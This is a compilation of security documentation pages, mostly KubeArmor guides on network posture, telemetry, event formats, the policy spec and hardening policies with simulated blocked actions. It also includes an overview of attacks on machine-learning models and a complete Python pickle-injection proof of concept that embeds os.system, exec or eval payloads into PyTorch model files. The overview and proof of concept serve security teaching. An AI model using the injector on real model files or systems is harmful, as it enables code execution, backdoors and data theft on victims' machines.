Resource: domain=AF_INET6 type=SOCK_DGRAM protocol=0
Data: syscall=SYS_SOCKET
Action: Audit
Result: Passed

Now let's update the default network posture to block for multiubuntu namespace.

~❯❯❯  kubectl annotate ns multiubuntu kubearmor-network-posture=block
namespace/multiubuntu annotated

Now if we try to access udp using curl, the action is blocked and related alerts are generated.

root@ubuntu-5-deployment-7778f46c67-hk6k6:/# curl google.com
curl: (6) Could not resolve host: google.com

Here curl couldn't resolve google.com due to blocked access to UDP.

Generated alert has Policy Name DefaultPosture and Action as Block

== Alert / 2022-03-21 13:06:27.731918 ==
Cluster Name: default
Host Name: kubearmor-dev-all
Namespace Name: multiubuntu
Pod Name: ubuntu-5-deployment-7778f46c67-hk6k6
Container ID: 1f92eb4c9d730862174be04f319763a2c1ac2752669807051c42ddc78aa102d1
Container Name: ubuntu-5-container
Policy Name: ksp-ubuntu-5-net-tcp-allow
Severity: 8
Type: MatchedPolicy
Source: /usr/bin/curl google.com
Operation: Network
Resource: domain=AF_INET6 type=SOCK_DGRAM protocol=0
Data: syscall=SYS_SOCKET
Action: Allow
Result: Permission denied

Let's try to set the annotation value to something invalid.

~❯❯❯  kubectl annotate ns multiubuntu kubearmor-network-posture=invalid --overwrite
namespace/multiubuntu annotated
~❯❯❯  kubectl describe ns multiubuntu
Name:         multiubuntu
Labels:       kubernetes.io/metadata.name=multiubuntu
Annotations:  kubearmor-network-posture: audit
Status:       Active

We can see that, annotation value was automatically updated to audit since that was global mode of operation for network in the KubeArmor configuration.

Control Telemetry/Visibility

KubeArmor currently supports enabling visibility for containers and hosts.

Visibility for hosts is not enabled by default, however it is enabled by default for containers .

The karmor tool provides access to both using karmor logs.

Available visibility options:

KubeArmor provides visibility on the following behavior of containers

  • Process

  • Files

  • Networks

Prerequisites

Example: wordpress-mysql

  • Now we need to deploy some sample policies

kubectl apply -f https://raw.githubusercontent.com/kubearmor/KubeArmor/main/examples/wordpress-mysql/security-policies/ksp-wordpress-block-process.yaml

This sample policy blocks execution of the apt and apt-get commands in wordpress pods with label selector app: wordpress.

Getting Container Visibility

  • Checking default visibility

    • Container visibility is enabled by default. We can check it using kubectl describe and grep kubearmor-visibility

    POD_NAME=$(kubectl get pods -n wordpress-mysql -l app=wordpress -o jsonpath='{.items[0].metadata.name}') && kubectl describe -n wordpress-mysql pod $POD_NAME | grep kubearmor-visibility
    
    kubearmor-visibility: process, file, network, capabilities
    • For pre-existing workloads : Enable visibility using kubectl annotate. Currently KubeArmor supports process, file, network, capabilities

    kubectl annotate pods <pod-name> -n wordpress-mysql "kubearmor-visibility=process,file,network,capabilities"
  • Open up a terminal, and watch logs using the karmor cli

    karmor logs
  • In another terminal, simulate a policy violation . Try sleep inside a pod

    POD_NAME=$(kubectl get pods -n wordpress-mysql -l app=wordpress -o jsonpath='{.items[0].metadata.name}') && kubectl -n wordpress-mysql exec -it $POD_NAME -- bash
    # apt update
  • In the terminal running karmor logs, the policy violation along with container visibility is shown, in this case for example

  • The logs can also be generated in JSON format using karmor logs --json

Getting Host Visibility

  • Host Visibility is not enabled by default . To enable Host Visibility we need to annotate the node using kubectl annotate node

  kubectl annotate node <node-name> "kubearmor-visibility=process,file,network,capabilities" 
  • To confirm it use kubectl describe and grep kubearmor-visibility

kubectl describe node <node-name> | grep kubearmor-visibility
  • Now we can get general telemetry events in the context of the host using karmor logs .The logs related to Host Visibility will have type Type: HostLogand Operation: File | Process | Network

karmor logs --logFilter=all
Click to expand
== Alert / 2023-01-04 04:58:37.689182 ==
== Log / 2023-01-27 14:41:49.017709 ==
ClusterName: default
HostName: kubearmor-dev2
Type: HostLog
Source: /usr/bin/dockerd
Resource: /usr/bin/runc --version
Operation: Process
Data: syscall=SYS_EXECVE
Result: Passed
HostPID: 193088
HostPPID: 914
PID: 193088
PPID: 914
ParentProcessName: /usr/bin/dockerd
ProcessName: /usr/bin/runc
== Log / 2023-01-27 14:41:49.018951 ==
ClusterName: default
HostName: kubearmor-dev2
Type: HostLog
Source: /usr/bin/runc --version
Resource: /lib/x86_64-linux-gnu/libc.so.6
Operation: File
Data: syscall=SYS_OPENAT fd=-100 flags=O_RDONLY|O_CLOEXEC
Result: Passed
HostPID: 193088
HostPPID: 914
PID: 193088
PPID: 914
ParentProcessName: /usr/bin/dockerd
ProcessName: /usr/bin/runc
== Log / 2023-01-27 14:41:49.018883 ==
ClusterName: default
HostName: kubearmor-dev2
Type: HostLog
Source: /usr/bin/runc --version
Resource: /etc/ld.so.cache
Operation: File
Data: syscall=SYS_OPENAT fd=-100 flags=O_RDONLY|O_CLOEXEC
Result: Passed
HostPID: 193088
HostPPID: 914
PID: 193088
PPID: 914
ParentProcessName: /usr/bin/dockerd
ProcessName: /usr/bin/runc
== Log / 2023-01-27 14:41:49.020905 ==
ClusterName: default
HostName: kubearmor-dev2
Type: HostLog
Source: /var/lib/rancher/k3s/data/2949af7261ce923f6a5091396d266a0e9d9436dcee976fcd548edc324eb277bb/bin/k3s
Resource: /var/lib/rancher/k3s/data/2949af7261ce923f6a5091396d266a0e9d9436dcee976fcd548edc324eb277bb/bin/portmap
Operation: Process
Data: syscall=SYS_EXECVE
Result: Passed
HostPID: 193090
HostPPID: 5627
PID: 193090
PPID: 5627
ParentProcessName: /var/lib/rancher/k3s/data/2949af7261ce923f6a5091396d266a0e9d9436dcee976fcd548edc324eb277bb/bin/k3s
ProcessName: /var/lib/rancher/k3s/data/2949af7261ce923f6a5091396d266a0e9d9436dcee976fcd548edc324eb277bb/bin/portmap
  • The logs can also be generated in JSON format using karmor logs --logFilter=all --json

Updating Namespace Visibility

KubeArmor has the ability to let the user select what kind of events have to be traced by changing the annotation kubearmor-visibility at the namespace.

  • Checking Namespace visibility

    • Namespace visibility can be checked using kubectl describe.

    kubectl describe ns wordpress-mysql | grep kubearmor-visibility
    
    kubearmor-visibility: process, file, network, capabilities
    • To update the visibility of namespace : Now let's update Kubearmor visibility using kubectl annotate. Currently KubeArmor supports process, file, network, capabilities. Lets try to update visibility for the namespace wordpress-mysql

     kubectl annotate ns wordpress-mysql kubearmor-visibility=network --overwrite
     "namespace/wordpress-mysql annotated"
    

    Note: To turn off the visibility across all aspects, use kubearmor-visibility=none. Note that any policy violations or events that results in non-success returns would still be reported in the logs.

  • Open up a terminal, and watch logs using the karmor cli

    karmor logs --logFilter=all -n wordpress-mysql
    
  • In another terminal, let's exec into the pod and run some process commands . Try ls inside the pod

      POD_NAME=$(kubectl get pods -n wordpress-mysql -l app=wordpress -o jsonpath='{.items[0].metadata.name}') && kubectl -n wordpress-mysql exec -it $POD_NAME -- bash
    # ls

    Now, we can notice that no logs have been generated for the above command and logs with only Operation: Network are shown.

    Note If telemetry is disabled, the user wont get audit event even if there is an audit rule.

    Note Only the logs are affected by changing the visibility, we still get all the alerts that are generated.

  • Let's simulate a sample policy violation, and see whether we still get alerts or not.

    • Policy violation :

    POD_NAME=$(kubectl get pods -n wordpress-mysql -l app=wordpress -o jsonpath='{.items[0].metadata.name}') && kubectl -n wordpress-mysql exec -it $POD_NAME -- bash
    #apt 

    Here, note that the alert with Operation: Process is reported.

Adversarial Attacks on Deep Learning Models

Adversarial attacks exploit vulnerabilities in AI systems by subtly altering input data to mislead the model into incorrect predictions or decisions. These perturbations are often imperceptible to humans but can significantly degrade the system's performance.

Types of Adversarial Attacks

  1. By Model Access:

    • White-box Attacks: Complete knowledge of the model, including architecture and training data.

    • Black-box Attacks: No information about the model; the attacker probes responses to craft inputs.

  2. By Target Objective:

    • Non-targeted Attacks: Push input to any incorrect class.

    • Targeted Attacks: Force input into a specific class.

Attack Phases

  1. Training Phase Attacks:

    • Data Poisoning: Injects malicious data into the training set, altering model behavior.

    • Backdoor Attacks: Embeds triggers in training data that activate specific responses during inference.

  2. Inference Phase Attacks:

    • Model Evasion: Gradually perturbs input to skew predictions (e.g., targeted misclassification).

    • Membership Inference: Exploits model outputs to infer sensitive training data (e.g., credit card numbers).

Observations on Model Robustness

Highly accurate models often exhibit reduced robustness against adversarial perturbations, creating a tradeoff between accuracy and security. For instance, Chen et al. found that better-performing models tend to be more sensitive to adversarial inputs.

Defense Strategies

  1. Pre-analysis: Test models for prompt injection vulnerabilities using techniques like fuzzing.

  2. Input Sanitation:

    • Validation: Enforce strict input rules (e.g., character and data type checks).

    • Filtering: Strip malicious scripts or fragments.

    • Encoding: Convert special characters to safe representations.

  3. Secure Practices for Model Deployment:

    • Restrict model permissions.

    • Regularly update libraries to patch vulnerabilities.

    • Detect injection attempts with specialized tooling.

Case Study: Pickle Injection Vulnerability

Python's pickle module allows serialization and deserialization but lacks security checks. Attackers can exploit this to execute arbitrary code using crafted payloads. The module’s inherent insecurity makes it risky to use with untrusted inputs.

Mitigation:

  • Avoid using pickle with untrusted sources.

  • Use secure serialization libraries like json or protobuf.

Relevant Resources


Pickle Code Injection PoC

The Pickle Code Injection Proof of Concept (PoC) demonstrates the security vulnerabilities in Python's pickle module, which can be exploited to execute arbitrary code during deserialization. This method is inherently insecure because it allows execution of arbitrary functions without restrictions or security checks.

Core Code Overview

Custom Pickle Injector:

import os, argparse, pickle, struct, shutil
from pathlib import Path
import torch

class PickleInject:
    def __init__(self, inj_objs, first=True):
        self.inj_objs = inj_objs
        self.first = first

    class _Pickler(pickle._Pickler):
        def __init__(self, file, protocol, inj_objs, first=True):
            super().__init__(file, protocol)
            self.inj_objs = inj_objs
            self.first = first

        def dump(self, obj):
            if self.proto >= 2:
                self.write(pickle.PROTO + struct.pack("<B", self.proto))
            if self.first:
                for inj_obj in self.inj_objs:
                    self.save(inj_obj)
            self.save(obj)
            if not self.first:
                for inj_obj in self.inj_objs:
                    self.save(inj_obj)
            self.write(pickle.STOP)

    def Pickler(self, file, protocol):
        return self._Pickler(file, protocol, self.inj_objs)

    class _PickleInject:
        def __init__(self, args, command=None):
            self.command = command
            self.args = args

        def __reduce__(self):
            return self.command, (self.args,)

    class System(_PickleInject):
        def __init__(self, args):
            super().__init__(args, command=os.system)

    class Exec(_PickleInject):
        def __init__(self, args):
            super().__init__(args, command=exec)

    class Eval(_PickleInject):
        def __init__(self, args):
            super().__init__(args, command=eval)

    class RunPy(_PickleInject):
        def __init__(self, args):
            import runpy
            super().__init__(args, command=runpy._run_code)
            def __reduce__(self):
                return self.command, (self.args, {})

# Parse Arguments
parser = argparse.ArgumentParser(description="PyTorch Pickle Inject")
parser.add_argument("model", type=Path)
parser.add_argument("command", choices=["system", "exec", "eval", "runpy"])
parser.add_argument("args")
args = parser.parse_args()

# Payload construction
command_args = args.args
if os.path.isfile(command_args):
    with open(command_args, "r") as in_file:
        command_args = in_file.read()

if args.command == "system":
    payload = PickleInject.System(command_args)
elif args.command == "exec":
    payload = PickleInject.Exec(command_args)
elif args.command == "eval":
    payload = PickleInject.Eval(command_args)
elif args.command == "runpy":
    payload = PickleInject.RunPy(command_args)

# Save the injected payload
backup_path = f"{args.model}.bak"
shutil.copyfile(args.model, backup_path)
torch.save(torch.load(args.model), f=args.model, pickle_module=PickleInject([payload]))

Example Exploits

  1. Print Injection:

    python torch_pickle_inject.py model.pth exec "print('hello')"
  2. Install Packages:

    python torch_pickle_inject.py model.pth system "pip install numpy"
  3. Adversarial Command Execution: Upon loading the tampered model:

    python main.py

    Output:

    • Installs the package or executes the payload.

    • Alters model behavior: changes predictions, losses, etc.

Attacker Use Cases

  1. Spreading Malware: The injected code can download and install malware on the target machine, which can then be used to infect other systems in the network or create a botnet.

  2. Backdoor Installation: An attacker can use pickle injection to install a backdoor that allows persistent access to the system, even if the original vulnerability is patched.

  3. Data Exfiltration: An attacker can use pickle injection to read sensitive files or data from the system and send it to a remote server. This can include configuration files, database credentials, or any other sensitive information stored on the machine.

Key Risks

The pickle module is inherently insecure for handling untrusted input due to its ability to execute arbitrary code.


KubeArmor Events

Supported formats

  1. Native Json format (this document)

  2. KubeArmor CEF Format (coming soon...)

Container Telemetry

Container Telemetry Fields format

Process Log
File Log
Network Log

Container Alerts

Container alerts are generated when there is a policy violation or audit event that is raised due to a policy action. For example, a policy might block execution of a process. When the execution is blocked by KubeArmor enforcer, KubeArmor generates an alert event implying policy action. In the case of an Audit action, the KubeArmor will only generate an alert without actually blocking the action.

The primary difference in the container alerts events vs the telemetry events (showcased above) is that the alert events contains certain additional fields such as policy name because of which the alert was generated and other metadata such as "Tags", "Message", "Severity" associated with the policy rule.

Container Alerts Fields format

Process Alert
File Alert
Network Alert

Host Alerts

The fields are self-explanatory and have similar meaning as in the context of container based events (explained above).

Process Alert
Blocked SETGID

Note that KubeArmor also alerts events blocked due to other system policy enforcement. For example, if an SELinux native rule blocks an action, KubeArmor will report those as well as DefaultPosture events. Following is an example of such event:

Blocked SETUID

Note that KubeArmor also alerts events blocked due to other system policy enforcement. For example, if an SELinux native rule blocks an action, KubeArmor will report those as well as DefaultPosture events. Following is an example of such event:

Policy Spec for Containers

Policy Specification

Here is the specification of a security policy.

Note Please note that for system calls monitoring we only support audit action no matter what the value of action is

Policy Spec Description

Now, we will briefly explain how to define a security policy.

Common

A security policy starts with the base information such as apiVersion, kind, and metadata. The apiVersion and kind would be the same in any security policies. In the case of metadata, you need to specify the names of a policy and a namespace where you want to apply the policy.

Severity

The severity part is somewhat important. You can specify the severity of a given policy from 1 to 10. This severity will appear in alerts when policy violations happen.

Tags

The tags part is optional. You can define multiple tags (e.g., WARNING, SENSITIVE, MITRE, STIG, etc.) to categorize security policies.

Message

The message part is optional. You can add an alert message, and then the message will be presented in alert logs.

Selector

MatchLabels

The selector part is relatively straightforward. Similar to other Kubernetes configurations, you can specify (a group of) pods based on labels.

MatchExpressions

Further in selector we can use matchExpressions to define labels to select/deselect the workloads. Currently, only labels can be matched, so the key should be 'label'. The operator will determine whether the policy should apply to the workloads specified in the values field or not.

Operator: In When the operator is set to In, the policy will be applied only to the workloads that match the labels in the values field.

Operator: NotIn When the operator is set to NotIn, the policy will be applied to all the workloads except that match the labels in the values field.

NOTE Both matchExpressions and matchLabel are an ANDed operation.

Process

In each match, there are three options.

  • ownerOnly (static action: allow owner only; otherwise block all)

    If this is enabled, the owners of the executable(s) defined with matchPaths and matchDirectories will be only allowed to execute.

  • recursive

    If this is enabled, the coverage will extend to the subdirectories of the directory defined with matchDirectories.

  • fromSource

    If a path is specified in fromSource, the executable at the path will be allowed/blocked to execute the executables defined with matchPaths or matchDirectories. For better understanding, let us say that an operator defines a policy as follows. Then, /bin/bash will be only allowed (blocked) to execute /bin/sleep. Otherwise, the execution of /bin/sleep will be blocked (allowed).

File

The file section is quite similar to the process section.

The only difference between 'process' and 'file' is the readOnly option.

  • readOnly (static action: allow to read only; otherwise block all)

    If this is enabled, the read operation will be only allowed, and any other operations (e.g., write) will be blocked.

Network

In the case of network, there is currently one match type: matchProtocols. You can define specific protocols among TCP, UDP, and ICMP.

Capabilities

Syscalls

In the case of syscalls, there are two types of matches, matchSyscalls and matchPaths. matchPaths can be used to target system calls targeting specific binary path or anything under a specific directory, additionally you can slice based on syscalls generated by a binary or a group of binaries in a directory. You can use matchSyscall as a more general rule to match syscalls from all sources or from specific binaries.

There is one options in each match.

  • fromSource

    If a path is specified in fromSource, kubearmor will match only syscalls generated by the defined source. For better undrestanding, lets take the example below. Only unlink system calls generated by /bin/bash will be matched.

  • recursive

    If this is enabled, the coverage will extend to the subdirectories of the directory.

  • Action

Service Account token: Protect access to k8s service account token

Description

K8s mounts the service account token as part of every pod by default. The service account token is a credential that can be used as a bearer token to access k8s APIs and gain access to other k8s entities. Many times there are no processes in the pod that use the service account tokens which means in such cases the k8s service account token is an unused asset that can be leveraged by the attacker.

Attack Scenario

It's important to note that attackers often look for ways to gain access to other entities within Kubernetes clusters. One common method is to check for credential accesses, such as service account tokens, in order to perform lateral movements. For instance, in many Kubernetes attacks, once the attacker gains entry into a pod, they may attempt to use a service account token to access other entities. Attack type Credential Access, Comand Injection Actual Attack Hildegard, BlackT, BlackCat RaaS

Compliance

  • CIS_Kubernetes_Benchmark_v1.27, Control-Id-5.1.6

Policy

Service account token

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-wordpress-block-service-account
  namespace: wordpress-mysql
spec:
  severity: 2
  selector:
    matchLabels:
      app: wordpress
  file:
    matchDirectories:
      - dir: /run/secrets/kubernetes.io/serviceaccount/
        recursive: true
  action: Block

Simulation

root@wordpress-7c966b5d85-42jwx:/# cd /run/secrets/kubernetes.io/serviceaccount/ 
root@wordpress-7c966b5d85-42jwx:/run/secrets/kubernetes.io/serviceaccount# ls 
ls: cannot open directory .: Permission denied 
root@wordpress-7c966b5d85-42jwx:/run/secrets/kubernetes.io/serviceaccount# 

Expected Alert

{
  "ATags": null,
  "Action": "Block",
  "ClusterName": "deathiscoming",
  "ContainerID": "bbf968e6a75f0b4412478770911c6dd05d5a83ec97ca38872246e89c31e9d41a",
  "ContainerImage": "docker.io/library/wordpress:4.8-apache@sha256:6216f64ab88fc51d311e38c7f69ca3f9aaba621492b4f1fa93ddf63093768845",
  "ContainerName": "wordpress",
  "Data": "syscall=SYS_OPENAT fd=-100 flags=O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC",
  "Enforcer": "AppArmor",
  "HashID": "f1c272d8d75bdd91b9c4d1dc74c8d0f222bf4ecd0008c3a22a54706563ec5827",
  "HostName": "aditya",
  "HostPID": 11105,
  "HostPPID": 10997,
  "Labels": "app=wordpress",
  "Message": "",
  "NamespaceName": "wordpress-mysql",
  "Operation": "File",
  "Owner": {
    "Name": "",
    "Namespace": "",
    "Ref": ""
  },
  "PID": 204,
  "PPID": 194,
  "PodName": "wordpress-7c966b5d85-42jwx",
  "PolicyName": "DefaultPosture",
  "ProcessName": "/bin/ls",
  "Resource": "/run/secrets/kubernetes.io/serviceaccount",
  "Result": "Permission denied",
  "Severity": "",
  "Source": "/bin/ls",
  "Tags": "",
  "Timestamp": 1695903189,
  "Type": "MatchedPolicy",
  "UID": 0,
  "UpdatedTime": "2023-09-28T12:13:09.159252Z",
  "cluster_id": "3664",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "workload": "1"
}

References

FIM: File Integrity Monitoring/Protection

Description

Changes to system binary folders, configuration paths, and credentials paths need to be monitored for change. With KubeArmor, one can not only monitor for changes but also block any write attempts in such system folders. Compliance frameworks such as PCI-DSS, NIST, and CIS expect FIM to be in place.

Attack Scenario

In a possible attack scenario, an attacker may try to update the configuration to disable security controls or access logs. This can allow them to gain further access to the system and carry out malicious activities undetected. It's crucial to be aware of such threats and take proactive measures to prevent such attacks from occurring. Attack Type Data Manipulation, Integrity Threats Actual Attack NetWalker, Conti, DarkSide RaaS

Compliance

  • CIS Distribution Independent Linuxv2.0, Control-Id:6.3.5

  • PCI-DSS, Requirement: 6

  • PCI-DSS, Requirement: 10

  • NIST_800-53_AU-2

  • MITRE_T1565_data_manipulation

Policy

File Integrity Monitoring

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: harden-mysql-file-integrity-monitoring
  namespace: wordpress-mysql
spec:
  action: Block
  file:
    matchDirectories:
    - dir: /sbin/
      readOnly: true
      recursive: true
    - dir: /usr/bin/
      readOnly: true
      recursive: true
    - dir: /usr/lib/
      readOnly: true
      recursive: true
    - dir: /usr/sbin/
      readOnly: true
      recursive: true
    - dir: /bin/
      readOnly: true
      recursive: true
    - dir: /boot/
      readOnly: true
      recursive: true
  message: Detected and prevented compromise to File integrity
  selector:
    matchLabels:
      app: mysql
  severity: 1
  tags:
  - NIST
  - NIST_800-53_AU-2
  - NIST_800-53_SI-4
  - MITRE
  - MITRE_T1036_masquerading
  - MITRE_T1565_data_manipulation

Simulation

kubectl exec -it mysql-74775b4bf4-65nqf -n wordpress-mysql -- bash
root@mysql-74775b4bf4-65nqf:/# cd sbin
root@mysql-74775b4bf4-65nqf:/sbin# touch file
touch: cannot touch 'file': Permission denied
root@mysql-74775b4bf4-65nqf:/sbin# cd ..

Expected Alert

{
  "ATags": [
    "NIST",
    "NIST_800-53_AU-2",
    "NIST_800-53_SI-4",
    "MITRE",
    "MITRE_T1036_masquerading",
    "MITRE_T1565_data_manipulation"
  ],
  "Action": "Block",
  "ClusterName": "aditya",
  "ContainerID": "b75628d4225b8071d5795da342cf2a5c03b1d67b22b40016697fcd17a0db20e4",
  "ContainerImage": "docker.io/library/mysql:5.6@sha256:20575ecebe6216036d25dab5903808211f1e9ba63dc7825ac20cb975e34cfcae",
  "ContainerName": "mysql",
  "Data": "syscall=SYS_OPEN flags=O_WRONLY|O_CREAT|O_NOCTTY|O_NONBLOCK",
  "Enforcer": "AppArmor",
  "HashID": "f0b220bfa3b7aeae754f3bf8a60dd1a0af001f5956ad22f625bdf83406a7fea3",
  "HostName": "aditya",
  "HostPID": 16462,
  "HostPPID": 16435,
  "Labels": "app=mysql",
  "Message": "Detected and prevented compromise to File integrity",
  "NamespaceName": "wordpress-mysql",
  "Operation": "File",
  "Owner": {
    "Name": "mysql",
    "Namespace": "wordpress-mysql",
    "Ref": "Deployment"
  },
  "PID": 167,
  "PPID": 160,
  "PodName": "mysql-74775b4bf4-65nqf",
  "PolicyName": "harden-mysql-file-integrity-monitoring",
  "ProcessName": "/bin/touch",
  "Resource": "/sbin/file",
  "Result": "Permission denied",
  "Severity": "1",
  "Source": "/usr/bin/touch file",
  "Tags": "NIST,NIST_800-53_AU-2,NIST_800-53_SI-4,MITRE,MITRE_T1036_masquerading,MITRE_T1565_data_manipulation",
  "Timestamp": 1696316210,
  "Type": "MatchedPolicy",
  "UID": 0,
  "UpdatedTime": "2023-10-03T06:56:50.829165Z",
  "cluster_id": "3896",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "workload": "1"
}

References

Packaging tools: Deny execution of package management tools

Description

Pods/Containers might get shipped with binaries which should never used in the production environments. Some of those bins might be useful in dev/staging environments but the same container image is carried forward in most cases to the production environment too. For security reasons, the devsecops team might want to disable the use of these binaries in the production environment even though the bins exists in the container. As an example, most of the container images are shipped with package management tools such as apk, apt, yum, etc. If anyone ends up using these bins in the prod env, it will increase the attack surface of the container/pod.

Attack Scenario

In an attack scenario, adversaries may use system tools such as fsck, ip, who, apt, and others for reconnaissance and to download additional tooling from remote servers. These tools can help them gain valuable information about the system and its vulnerabilities, allowing them to carry out further attacks. It's important to be vigilant about such activities and implement security measures to prevent such attacks from happening. Attack Type Command Injection, Malware, Backdoor Actual Attack AppleJeus, Codecov supply chain

Compliance

  • CIS Distribution Independent Linuxv2.0

  • Control-Id:6.4.5

  • NIST_800-53_SI-4

  • NIST_800-53_CM-7(4)

Policy

Packaging tools execution

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: harden-mysql-pkg-mngr-exec
  namespace: wordpress-mysql
spec:
  action: Block
  message: Alert! Execution of package management process inside container is denied
  process:
    matchPaths:
    - path: /usr/bin/apt
    - path: /usr/bin/apt-get
    - path: /bin/apt-get
    - path: /sbin/apk
    - path: /bin/apt
    - path: /usr/bin/dpkg
    - path: /bin/dpkg
    - path: /usr/bin/gdebi
    - path: /bin/gdebi
    - path: /usr/bin/make
    - path: /bin/make
    - path: /usr/bin/yum
    - path: /bin/yum
    - path: /usr/bin/rpm
    - path: /bin/rpm
    - path: /usr/bin/dnf
    - path: /bin/dnf
    - path: /usr/bin/pacman
    - path: /usr/sbin/pacman
    - path: /bin/pacman
    - path: /sbin/pacman
    - path: /usr/bin/makepkg
    - path: /usr/sbin/makepkg
    - path: /bin/makepkg
    - path: /sbin/makepkg
    - path: /usr/bin/yaourt
    - path: /usr/sbin/yaourt
    - path: /bin/yaourt
    - path: /sbin/yaourt
    - path: /usr/bin/zypper
    - path: /bin/zypper
  selector:
    matchLabels:
      app: mysql
  severity: 5
  tags:
  - NIST
  - NIST_800-53_CM-7(4)
  - SI-4
  - process
  - NIST_800-53_SI-4

Simulation

kubectl exec -it mysql-74775b4bf4-65nqf -n wordpress-mysql -- bash
root@mysql-74775b4bf4-65nqf:/# apt
bash: /usr/bin/apt: Permission denied
root@mysql-74775b4bf4-65nqf:/# apt-get
bash: /usr/bin/apt-get: Permission denied

Expected Alert

{
  "ATags": [
    "NIST",
    "NIST_800-53_CM-7(4)",
    "SI-4",
    "process",
    "NIST_800-53_SI-4"
  ],
  "Action": "Block",
  "ClusterName": "aditya",
  "ContainerID": "b75628d4225b8071d5795da342cf2a5c03b1d67b22b40016697fcd17a0db20e4",
  "ContainerImage": "docker.io/library/mysql:5.6@sha256:20575ecebe6216036d25dab5903808211f1e9ba63dc7825ac20cb975e34cfcae",
  "ContainerName": "mysql",
  "Data": "syscall=SYS_EXECVE",
  "Enforcer": "AppArmor",
  "HashID": "dd573c234f68b8df005e8cd314809c8b2a23852230d397743e348bf4a03ada3f",
  "HostName": "aditya",
  "HostPID": 21894,
  "HostPPID": 16435,
  "Labels": "app=mysql",
  "Message": "Alert! Execution of package management process inside container is denied",
  "NamespaceName": "wordpress-mysql",
  "Operation": "Process",
  "Owner": {
    "Name": "mysql",
    "Namespace": "wordpress-mysql",
    "Ref": "Deployment"
  },
  "PID": 168,
  "PPID": 160,
  "PodName": "mysql-74775b4bf4-65nqf",
  "PolicyName": "harden-mysql-pkg-mngr-exec",
  "ProcessName": "/usr/bin/apt",
  "Resource": "/usr/bin/apt",
  "Result": "Permission denied",
  "Severity": "5",
  "Source": "/bin/bash",
  "Tags": "NIST,NIST_800-53_CM-7(4),SI-4,process,NIST_800-53_SI-4",
  "Timestamp": 1696318864,
  "Type": "MatchedPolicy",
  "UID": 0,
  "UpdatedTime": "2023-10-03T07:41:04.096412Z",
  "cluster_id": "3896",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "workload": "1"
}

References

Trusted certs bundle: Protect write access to the trusted root certificates bundle

Description

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary-controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system.

Attack Scenario

By using this technique, attackers can successfully evade security warnings that alert users when compromised systems connect over HTTPS to adversary-controlled web servers. These servers often look like legitimate websites, and are designed to trick users into entering their login credentials, which can then be used by the attackers. It's important to be aware of this threat and take necessary precautions to prevent these attacks from happening. Attack Type Man-In-The-Middle(MITM) Actual Attack POODLE(Padding Oracle On Downgraded Legacy Encryption), BEAST (Browser Exploit Against SSL/TLS)

Compliance

  • CIS Distribution Independent Linuxv2.0

  • Control-Id: 6.3.4

  • MITRE_T1552_unsecured_credentials

Policy

Trusted Certs Bundle

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: harden-mysql-trusted-cert-mod
  namespace: wordpress-mysql
spec:
  action: Block
  file:
    matchDirectories:
    - dir: /etc/ssl/
      readOnly: true
      recursive: true
    - dir: /etc/pki/
      readOnly: true
      recursive: true
    - dir: /usr/local/share/ca-certificates/
      readOnly: true
      recursive: true
  message: Credentials modification denied
  selector:
    matchLabels:
      app: mysql
  severity: 1
  tags:
  - MITRE
  - MITRE_T1552_unsecured_credentials
  - FGT1555
  - FIGHT

Simulation

 kubectl exec -it mysql-74775b4bf4-65nqf -n wordpress-mysql -- bash
root@mysql-74775b4bf4-65nqf:/# cd /etc/ssl/
root@mysql-74775b4bf4-65nqf:/etc/ssl# ls
certs
root@mysql-74775b4bf4-65nqf:/etc/ssl# rmdir certs
rmdir: failed to remove 'certs': Permission denied
root@mysql-74775b4bf4-65nqf:/etc/ssl# cd certs/
root@mysql-74775b4bf4-65nqf:/etc/ssl/certs# touch new
touch: cannot touch 'new': Permission denied
root@mysql-74775b4bf4-65nqf:/etc/ssl/certs#

Expected Alert

{
  "Action": "Block",
  "ClusterName": "aditya",
  "ContainerID": "b75628d4225b8071d5795da342cf2a5c03b1d67b22b40016697fcd17a0db20e4",
  "ContainerImage": "docker.io/library/mysql:5.6@sha256:20575ecebe6216036d25dab5903808211f1e9ba63dc7825ac20cb975e34cfcae",
  "ContainerName": "mysql",
  "Data": "syscall=SYS_RMDIR",
  "Enforcer": "AppArmor",
  "HostName": "aditya",
  "HostPID": 24462,
  "HostPPID": 24411,
  "Labels": "app=mysql",
  "Message": "Credentials modification denied",
  "NamespaceName": "wordpress-mysql",
  "Operation": "File",
  "Owner": {
    "Name": "mysql",
    "Namespace": "wordpress-mysql",
    "Ref": "Deployment"
  },
  "PID": 185,
  "PPID": 179,
  "ParentProcessName": "/bin/bash",
  "PodName": "mysql-74775b4bf4-65nqf",
  "PolicyName": "harden-mysql-trusted-cert-mod",
  "ProcessName": "/bin/rmdir",
  "Resource": "/etc/ssl/certs",
  "Result": "Permission denied",
  "Severity": "1",
  "Source": "/bin/rmdir certs",
  "Tags": "MITRE,MITRE_T1552_unsecured_credentials,FGT1555,FIGHT",
  "Timestamp": 1696320102,
  "Type": "MatchedPolicy",
  "UpdatedTime": "2023-10-03T08:01:42.373810Z",
  "cluster_id": "3896",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "tenant_id": "167",
  "workload": "1"
}

References

.)

Database access: Protect read/write access to raw database tables from unknown processes.

Description

Applications use databases to store all the information such as posts, blogs, user information, etc. WordPress applications almost certainly use a MySQL database for storing their content, and those are usually stored elsewhere on the system, often /var/lib/mysql/some_db_name.

Attack Scenario

Adversaries have been known to use various techniques to steal information from databases. This information can include user credentials, posts, blogs, and more. By obtaining this information, adversaries can gain access to user accounts and potentially perform a full-account takeover, which can lead to further compromise of the target system. It's important to ensure that appropriate security measures are in place to protect against these types of attacks. Attack Type SQL Injection, Credential Access, Account Takeover Actual Attack Yahoo Voices Data Breach in 2012

Compliance

